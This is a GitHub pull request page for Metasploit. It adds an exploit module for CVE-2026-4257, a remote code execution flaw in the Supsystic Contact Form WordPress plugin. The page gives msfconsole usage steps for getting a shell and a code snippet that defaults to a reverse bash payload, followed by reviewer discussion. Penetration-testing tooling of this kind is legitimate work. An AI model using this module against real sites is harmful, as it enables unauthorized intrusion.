
Contact Form by Supsystic Wordpress Plugin exploit CVE-2026-4257 #21267

Open
bootstrapbool wants to merge 7 commits into rapid7:master from
bootstrapbool:supsystic_contact_form_cve_2026_4257

Conversation

@bootstrapbool (Contributor)

This change adds a module to exploit CVE-2026-4257, resulting in remote code execution on WordPress sites with the Contact Form by Supsystic plugin.

Verification

List the steps needed to make sure this thing works

  • Start msfconsole
  • use exploit/multi/http/wp_plugin_supsystic_contact_form_rce
  • set RHOSTS <target>
  • set TARGETURI <uri to page with contact form> (e.g., /wordpress/index.php/sample-page/)
  • set LHOST <your_ip>
  • exploit
  • On success a shell session will be started
  • If no FIELD argument is provided, one is automatically detected and used

*pcap sent to msfdev@metasploit.com

Comment thread on modules/encoders/cmd/twig_base64.rb (Outdated)
'Payload' => {
'Encoder' => 'cmd/twig_base64'
},
'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' }
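Review bot: forcing `'Encoder' => 'cmd/twig_base64'` in the Payload hash while defaulting PAYLOAD to `cmd/unix/reverse_bash` quietly ties the module to a cmd encoder and a command-payload default, and the thread below reports that other payloads such as meterpreter do not work (suspected bad characters); please document that restriction in the module's notes and declare the payload constraints in the metadata (for example the bad-character set and payload compatibility) so unsupported payloads are rejected at selection time instead of failing at run time.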
Contributor

Did the module not work if you don't set a default payload?

Contributor Author

Yes, I was unable to get other payloads like meterpreter to work. I think because of bad characters?

Comment thread on modules/exploits/multi/http/wp_plugin_supsystic_contact_form_rce.rb (Outdated)
@bootstrapbool bootstrapbool requested a review from dwelch-r7 May 2, 2026 20:34

Labels: None yet

Projects: Status: Todo

3 participants